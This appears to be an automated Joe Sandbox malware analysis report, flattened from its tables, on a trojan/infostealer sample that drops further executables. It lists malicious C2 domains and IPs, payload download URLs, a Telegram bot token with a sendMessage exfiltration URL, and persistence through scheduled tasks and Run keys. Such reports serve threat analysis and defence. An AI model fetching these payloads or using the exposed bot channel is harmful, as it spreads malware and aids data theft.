                    C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\main\extracted\in.exe70%ReversingLabsWin64.Trojan.Nekark
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    aspecteirs.latfalse
                      high
                      sweepyribs.latfalse
                        high
                        sustainskelet.latfalse
                          high
                          45.200.149.15true
                            unknown
                            rapeflowwj.latfalse
                              high
                              energyaffai.latfalse
                                high
                                grannyejh.latfalse
                                  high
                                  necklacebudi.latfalse
                                    high
                                    crosshuaht.latfalse
                                      high
                                      discokeyus.latfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.t.com/pkpowershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://discokeyus.lat/V950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/botvQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                  high
                                                  https://go.microsoft.copowershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://discokeyus.lat/S950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://discokeyus.lat/M950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://185.215.113.43/Zu7JuNko/index.php907001skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://31.41.244.11/files/7781867830/2gwmtZs.exeskotes.exe, 00000009.00000002.4662164077.00000000013A1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://31.41.244.11/files/fate/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://185.215.113.43/Zu7JuNko/index.phpskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://185.215.113.43/Zu7JuNko/index.phpxeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.libertyreserve.com/beta/xml/transfer.aspxskotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.microsoft.Ppowershell.exe, 00000032.00000002.3673297976.0000020C3CE85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://31.41.244.11/files/Krokodyl02/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://31.41.244.11/files/zhigarko/random.exewUskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://185.215.113.16/well/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://185.215.113.43/Zu7JuNko/index.phpZk)skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://31.41.244.11/files/karl/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/soap/encoding/vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://31.41.244.11/files/burpin1/random.exeQUskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage?chat_id=14349vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://nsis.sf.net/NSIS_ErrorError0064eff6c8.exe, 00000012.00000002.3072593719.0000000000409000.00000002.00000001.01000000.0000000E.sdmp, 0064eff6c8.exe, 00000012.00000000.3046784847.0000000000409000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                                          high
                                                                                                          http://31.41.244.11/files/martin/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://discokeyus.lat/_;950932ab59.exe, 00000034.00000002.3517224743.0000000001563000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458081477.0000000001563000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zskotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://31.41.244.11/files/unique1/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://sci.libertyreserve.com/skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://31.41.244.11/files/unique2/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://31.41.244.11/files/wicked/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://31.41.244.11/files/karl/random.exeZskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://api.telegram.orgvQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ocsp.sectigo.com0skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.comskotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://185.215.113.43/Zu7JuNko/index.php_skotes.exe, 00000009.00000002.4662164077.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://185.215.113.43/Zu7JuNko/index.phpFskotes.exe, 00000009.00000003.3988275528.00000000015BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://ocsps.ssl.com0skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://185.215.113.43/tskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://185.215.113.43/Zu7JuNko/index.phpGskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://discokeyus.lat/api950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://185.215.113.43/Zu7JuNko/index.phpNskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://185.215.113.16/luma/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://104.168.28.10/003.exeskotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://31.41.244.11/files/1434988227/vQeyqr1.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exeskotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://185.215.113.43/Zu7JuNko/index.phpBskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://contoso.com/powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.ssl.com/repository0skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://31.41.244.11/files/burpin1/random.exe;Uskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://185.215.113.43/Zu7JuNko/index.php&skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://185.215.113.43/inrskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://crl.micro8950932ab59.exe, 00000034.00000003.3458081477.000000000155F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://185.215.113.43/Zu7JuNko/index.php2skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://31.41.244.11/files/wicked/random.exejskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://sectigo.com/CPS0skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://31.41.244.11/files/loadman/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://185.215.113.16/steam/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://185.215.113.43/skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://185.215.113.43/Zu7JuNko/index.php911001skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://discokeyus.lat/apip950932ab59.exe, 00000034.00000003.3459174810.000000000152D000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3516065712.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://31.41.244.11/files/zhigarko/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://185.215.113.43/Zu7JuNko/index.phpvskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://185.215.113.43/Zu7JuNko/index.phpzskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yskotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://31.41.244.11/files/6165238488/RzAAR0y.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://185.215.113.43/dkkskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://discokeyus.lat/950932ab59.exe, 00000034.00000002.3514958295.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3459174810.000000000150A000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://31.41.244.11/files/wicked/random.exeNskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://185.215.113.43/Zu7JuNko/index.phpeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://usbtor.ru/viewtopic.php?t=798)Z28d287a54d.exe, 0000000D.00000000.2915653913.0000000000423000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://185.215.113.16/off/random.exeskotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            185.215.113.43
                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                            185.121.15.192
                                                                                                                                                                                                                            unknownSpain
                                                                                                                                                                                                                            207046REDSERVICIOESfalse
                                                                                                                                                                                                                            52.168.117.173
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            1.1.1.1
                                                                                                                                                                                                                            unknownAustralia
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            104.21.21.99
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            213.152.176.135
                                                                                                                                                                                                                            unknownNetherlands
                                                                                                                                                                                                                            49453GLOBALLAYERNLfalse
                                                                                                                                                                                                                            104.168.28.10
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            36352AS-COLOCROSSINGUSfalse
                                                                                                                                                                                                                            185.215.113.16
                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                            45.200.149.15
                                                                                                                                                                                                                            unknownSeychelles
                                                                                                                                                                                                                            328608Africa-on-Cloud-ASZAtrue
                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            53334TUT-ASUSfalse
                                                                                                                                                                                                                            149.154.167.220
                                                                                                                                                                                                                            unknownUnited Kingdom
                                                                                                                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                                                                                                                            34.226.108.155
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                                                                            31.41.244.11
                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                            61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1579159
                                                                                                                                                                                                                            Start date and time:2024-12-20 23:11:22 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 15m 35s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:54
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@96/105@0/14
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                            • VT rate limit hit for: file.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            17:13:01API Interceptor219897x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                            17:13:45API Interceptor117x Sleep call for process: 2gwmtZs.exe modified
                                                                                                                                                                                                                            17:13:48API Interceptor1x Sleep call for process: 0064eff6c8.exe modified
                                                                                                                                                                                                                            17:13:53API Interceptor69x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            17:14:14API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                            17:14:24API Interceptor2x Sleep call for process: 950932ab59.exe modified
                                                                                                                                                                                                                            17:14:33API Interceptor63333x Sleep call for process: 22b0b7688f.exe modified
                                                                                                                                                                                                                            17:14:42API Interceptor13901x Sleep call for process: RzAAR0y.exe modified
                                                                                                                                                                                                                            17:16:11API Interceptor31x Sleep call for process: vQeyqr1.exe modified
                                                                                                                                                                                                                            23:12:18Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            23:14:16Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                            23:15:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe
                                                                                                                                                                                                                            23:15:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe
                                                                                                                                                                                                                            23:15:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe
                                                                                                                                                                                                                            23:16:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe
                                                                                                                                                                                                                            23:16:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                            23:16:13Task SchedulerRun new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                            23:16:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe
                                                                                                                                                                                                                            23:16:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe
                                                                                                                                                                                                                            23:16:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe
                                                                                                                                                                                                                            23:16:44Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                            23:16:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
